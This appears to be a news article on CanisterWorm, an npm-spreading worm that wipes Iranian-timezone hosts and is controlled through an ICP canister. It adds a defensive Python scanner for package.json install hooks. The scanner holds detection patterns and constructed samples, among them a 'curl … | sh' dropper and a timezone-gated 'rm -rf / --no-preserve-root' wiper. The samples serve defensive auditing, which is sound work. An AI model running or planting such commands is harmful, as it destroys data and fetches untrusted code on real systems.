CanisterWorm malware wipes Iranian machines for no apparent reason — sophisticated attack spreads through npm packages and uses ICP canister as control surface
This one is particularly hard to take down.
Self-replicating software that spreads on its own to any machine it can reach, known as a worm, is a common sight in the cybersecurity world. It is not every day, however, that a hacking group takes a detour from its usual pursuit of money to simply wipe machines located in one specific nation, in this case Iran, while using a novel control mechanism.
The TeamPCP collective, which appears to have formed recently, made news last December for targeting widely deployed server software such as Docker, Kubernetes, Redis, and Next.js. The group's main goal appears to be building a proxy network that it (or, presumably, its customers) can use to launch ransomware and extortion attacks, among other malicious operations.
While most of the group's activity so far has been aimed at making money, the latest version of its software, dubbed CanisterWorm, checks the system's time zone and, if it indicates Iran, completely erases the host. On a Kubernetes host it wipes every machine in the cluster; an ordinary VM of any kind simply gets a good ol' "rm -rf / --no-preserve-root", no questions asked. If the machine is not Iranian, the infection and spread continue as usual.
There is no obvious motivation for the data wipe, especially since a dead host is of little use to a parasite. In a statement to KrebsOnSecurity, Aikido researcher Charlie Eriksen said the group appeared to be showing off, and hypothesized that it may hold credentials to far more systems than those that took part in the attack.
The latest attack began over the past weekend with a compromise of Trivy, an open-source vulnerability scanner that many developers run as part of their software publishing pipeline. Node.js (npm) packages whose pipelines used Trivy had their publishing credentials harvested, and from there the malware spread to other npm packages and set up a multitude of background processes masquerading as standard system services.
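A spread through npm publishing credentials lands in package lifecycle hooks, so a practical first check on a build host is to audit the `scripts` section of every installed `package.json` for a destructive command gated on a time-zone probe. The scanner below is an added example written for this article; it is not code from the article, from Aikido, or from TeamPCP. The regular-expression heuristics, the package names, and the three sample `package.json` documents are constructed for illustration and are not published CanisterWorm indicators.

```python
"""Heuristic audit of npm lifecycle scripts for time-zone-gated wiper behaviour.

Added example (editor's own code, not the article's or the malware's). The
patterns are illustrative heuristics, not published indicators; the sample
documents at the bottom are constructed and are only ever parsed, never run.
"""
import json
import re
from pathlib import Path
from typing import Dict, List, Tuple

# Hooks npm runs automatically on install/publish; the usual place for payloads.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare",
                   "prepublish", "prepublishOnly", "postpack")

# Editor-chosen heuristics. Each entry is (finding name, compiled regex).
PATTERNS = [
    ("destructive_rm",
     re.compile(r"\brm\s+-[a-zA-Z]*r[a-zA-Z]*f[a-zA-Z]*\s+/(?:\s|$|['\"])"
                r"|--no-preserve-root")),
    ("cluster_delete",
     re.compile(r"\bkubectl\s+delete\b.*?(?:--all\b|\bnodes?\b|\bnamespaces?\b)", re.I)),
    ("timezone_probe",
     re.compile(r"\bTZ\b|/etc/timezone|/etc/localtime|\btimedatectl\b|"
                r"resolvedOptions\(\)\.timeZone|getTimezoneOffset", re.I)),
    ("remote_exec",
     re.compile(r"\b(?:curl|wget)\b[^|;]*\|\s*(?:ba|z)?sh\b", re.I)),
]


def scan_scripts(package_json_text: str) -> List[Tuple[str, str]]:
    """Return (hook, finding) pairs for every heuristic hit in lifecycle scripts."""
    data = json.loads(package_json_text)
    scripts = data.get("scripts") or {}
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        for name, rx in PATTERNS:
            if rx.search(cmd):
                findings.append((hook, name))
    return findings


def classify(findings: List[Tuple[str, str]]) -> str:
    """Collapse findings into a verdict; a wipe gated on a tz probe ranks highest."""
    names = {name for _, name in findings}
    destructive = bool(names & {"destructive_rm", "cluster_delete"})
    if destructive and "timezone_probe" in names:
        return "timezone_gated_wiper"
    if destructive:
        return "destructive"
    if names:
        return "suspicious"
    return "clean"


def scan_tree(root: str) -> Dict[str, str]:
    """Walk a node_modules tree and report every package.json that is not clean."""
    results: Dict[str, str] = {}
    for path in Path(root).rglob("package.json"):
        try:
            verdict = classify(scan_scripts(path.read_text(encoding="utf-8")))
        except (json.JSONDecodeError, OSError):
            verdict = "unparsable"
        if verdict != "clean":
            results[str(path)] = verdict
    return results


# Constructed samples (hypothetical package names; not real packages).
SAMPLE_BENIGN = json.dumps({
    "name": "example-benign", "version": "1.0.0",
    "scripts": {"test": "node test.js", "postinstall": "node scripts/build.js"},
})
SAMPLE_DROPPER = json.dumps({
    "name": "example-dropper", "version": "2.1.0",
    "scripts": {"preinstall": "curl -s https://example.invalid/x.sh | sh"},
})
SAMPLE_WIPER = json.dumps({
    "name": "example-gated-wiper", "version": "0.0.1",
    "scripts": {"postinstall": (
        "sh -c 'tz=$(cat /etc/timezone 2>/dev/null); case \"$tz\" in "
        "Asia/Tehran) rm -rf / --no-preserve-root ;; *) node bin/agent.js & ;; esac'"
    )},
})

if __name__ == "__main__":
    for label, doc in (("benign", SAMPLE_BENIGN), ("dropper", SAMPLE_DROPPER),
                       ("wiper", SAMPLE_WIPER)):
        print(f"{label:8s} -> {classify(scan_scripts(doc))}")
```

Run it against a real tree with `scan_tree("node_modules")`; anything reported as `timezone_gated_wiper` or `destructive` deserves a manual read of the script before the next `npm install` on that host. The heuristics will miss payloads that fetch their logic at runtime, which is exactly why the dead-drop channel described below matters for defenders.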
What makes this attack technically novel is that its command-and-control infrastructure, the "control panel" of the malware network's operators, was a dead drop published on an ICP (Internet Computer Protocol) canister, hence the name CanisterWorm. A canister is a kind of smart contract, a small blockchain-hosted bundle of code and data that is particularly resilient to takedown because of its distributed nature.
Unlike cryptocurrency blockchains such as Bitcoin or Ethereum, ICP requires its node operators to undergo a strict identification and vetting process and to provide substantial hardware. Estimates put the number of participating machines at around 1,400 (half active, half on standby) across more than 100 node providers in 34 countries.
Given the open nature of the ICP protocol, canisters are by design operable only by their original creator, and although ICP accepts reports of malware, those reports are then subject to a voting process with an exceedingly high threshold, so that the network cannot be forced into, for example, a government-requested takedown. In this case TeamPCP appears to have "disarmed" the canister after the attack's public disclosure, but it can be re-enabled at any time, so the practical mitigation for defenders is to block the canister's address at the network level.
